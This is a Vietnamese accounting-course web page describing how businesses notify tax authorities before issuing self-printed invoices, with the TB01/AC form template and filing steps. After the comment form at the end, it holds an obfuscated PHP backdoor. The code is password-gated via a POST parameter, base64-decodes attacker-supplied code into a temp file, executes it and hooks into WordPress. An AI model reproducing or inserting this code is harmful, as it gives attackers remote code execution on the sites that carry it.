1

Thủ tục thông báo phát hành hóa đơn tự in

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Thủ tục thông báo phát hành hóa đơn tự in

Cập nhật: 23:47 29/12/2012

Thông thường thủ tục phát hành hóa đơn bao gồm:

– Thông báo phát hành Hóa đơn (Mẫu TB01/ACThông tư 153)

  (Thông báo phát hành hóa đơn đươc làm  trên HTKK 3.1.3 phần Hóa đơn >>> Thông báo PH HĐ)
– Bộ Hóa đơn mẫu (3 liên) số 0000000 (7 chữ số)
– Hợp đồng đặt in Hóa đơn
– Biên bản nghiệm thu, thanh lý Hợp đồng
– Biên bản hủy bản kẽm

 

 

        CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM             Độc lập  – Tự do – Hạnh phúc

Mẫu: TB01/AC

(Ban hành kèm theo Thông tư số 153/2010/TT-BTC ngày 28/9/2010 của Bộ Tài chính)

                                   THÔNG BÁO PHÁT HÀNH HOÁ ĐƠN

                            (Dành cho tổ chức, cá nhân kinh doanh đặt in, tự in)

1. Tên đơn vị phát hành hoá đơn: Ghi tên Doanh Nghiệp phát hành sử dụng hóa đơn.

2. Mã số thuế: Ghi theo MST của Doanh Nghiệp phát hành sử dụng hóa đơn

3. Địa chỉ trụ sở chính: Ghi địa chỉ của Doanh nghiệp phát hành sử dụng hóa đơn

4. Điện thoại: Ghi số điện thoại liên hệ của Kế toán trưởng, hoặc người phụ trách.

5. Các loại hoá đơn phát hành:

STT

Tên loại

hoá đơn

Mẫu số

Ký hiệu

Số lượng

Từ số

Đến số

Ngày bắt đầu sử dụng

Doanh nghiệp in

Hợp đồng đặt in

Tên

MST

Số

Ngày

 

01

Hóa đơn Gía trị gia tăng

01GTKT3/001

AA/11P

 

 

105.000

 

 

0000001

 

 

0105000

 

 

dd/mm/2011

CTY TNHH Giấy vi tính Liên Sơn

 

 

0301452923

 

 

xxxx

 

 

dd/mm/yyyy

 

                       
                       

6. Thông tin đơn vị chủ 
– Tên đơn vị:
…………………………………………………………………………………………………………………….quản (trường hợp tổ chức, cá nhân dùng hóa đơn của đơn vị chủ quản đặt in, tự in):

– Mã số thuế:……………………………………………………………………………………………………………………

7. Tên cơ quan thuế tiếp nhận thông báo:…………………………………………………………………………

Ghi chú: Tổ chức, cá nhân tự in hoá đơn không ghi cột Doanh nghiệp in và Hợp đồng đặt in

   

 ………, ngày………tháng…..năm 2012

NGƯỜI ĐẠI DIỆN THEO PHÁP LUẬT

        (Ký, đóng dấu và ghi rõ họ tên)

Ghi chú: 

Không in phần này vào TBPH : Chữ màu đỏ thay thế nội dung theo Hợp đồng đặt in, Sau khi đặt in xong. Hồ sơ nộp Cơ quan thuế trước 5 ngày khi bắt đầu sử dụng gồm : 1 bộ hóa đơn mẫu đủ các liên được in chính thức mang số 0000000 có đóng dấu MẪU do Cty Liên Sơn cung cấp cho Doanh nghiệp và 2 bản chính thông báo phát hành hóa đơn này ký tên và đóng dấu của doanh nghiệp. Sau khi nộp xong, doanh nghiệp giữ lại 1 bản thông báo phát hành có xác nhận của Cơ quan Thuế.

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}